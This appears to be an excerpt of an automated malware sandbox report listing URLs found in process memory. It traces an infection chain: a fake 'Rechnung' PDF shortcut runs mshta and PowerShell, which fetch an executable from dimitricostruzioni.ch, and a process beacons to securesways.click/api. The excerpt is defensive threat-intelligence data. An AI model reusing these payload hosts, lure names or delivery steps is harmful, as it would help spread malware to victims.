Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0L
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcd.com0&
Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0#
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr | String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr | String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-/W3C/DTD
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.info-zip.org/
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps0(
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/rpa00
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0/
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.10.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.c
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch
                      Source: mshta.exe, 00000005.00000003.2665496381.000001BB90B79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/d
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/di
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dim
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimi
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimit
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitr
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/T
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TC
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCU
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUI
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUIN
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINO
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOV
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.e
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.ex
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.exe
                      Source: mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672431998.000001C3937F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, Rechnung736258.pdf.lnkString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie
                      Source: powershell.exeString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie$global:?
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie(
                      Source: mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...
                      Source: mshta.exe, 00000005.00000002.2679004868.000001C39374B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...K
                      Source: mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...w
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie1
                      Source: WMIC.exe, 00000000.00000002.2025601341.00000155F9FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie=C:
                      Source: mshta.exe, 00000005.00000003.2665693164.000001BB90BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676895482.000001BB90AE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677379657.000001BB90BD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665496381.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieC:
                      Source: mshta.exe, 00000005.00000002.2678187215.000001C3929E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieH
                      Source: mshta.exe, 00000005.00000002.2683202614.000001C3978A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieLMEM
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieV
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieaj
                      Source: mshta.exe, 00000005.00000003.2673692306.000001C399325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliehttps://dimitricostruzioni.ch/documentcomplie
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliep
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplies
                      Source: mshta.exe, 00000005.00000002.2677433600.000001BB90E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliesLO
                      Source: WMIC.exe, 00000000.00000003.2024092555.00000155FA065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieth=
                      Source: mshta.exe, 00000005.00000002.2683407387.000001C397F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie~l
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/KlarnaInvoice42611.pdf
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exe, 00000006.00000003.2080132292.00000208617C3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000006.00000003.2080132292.0000020861750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                      Source: explorer.exe, 00000015.00000003.2767821799.0000000003120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/
                      Source: explorer.exe, 00000015.00000003.2817683193.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2780823984.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/1
                      Source: explorer.exe, 00000015.00000003.2840242712.0000000003121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841475060.0000000003121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/C
                      Source: explorer.exe, explorer.exe, 00000015.00000003.2780432766.0000000005EF3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817804063.0000000003130000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2663040829.0000000005F06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2738829020.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2662553402.0000000005F06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2686479139.0000000005F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767792201.0000000005F0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839174291.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767254159.0000000005F0A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2738398343.000000000310D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817718397.0000000005F0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2763657975.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817832934.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767715738.000000000310D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841308679.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 
00000015.00000002.2840914690.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/api
                      Source: explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840914690.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/api1N
                      Source: explorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiM
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiU
                      Source: explorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apia
                      Source: explorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiaX
                      Source: explorer.exe, 00000015.00000003.2763626121.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2763685587.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apis
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2633160316.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click:443/api
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: https://stats.itopupdate.com/multi_app_new.php
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                      Source: iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.cat/verCIT-10
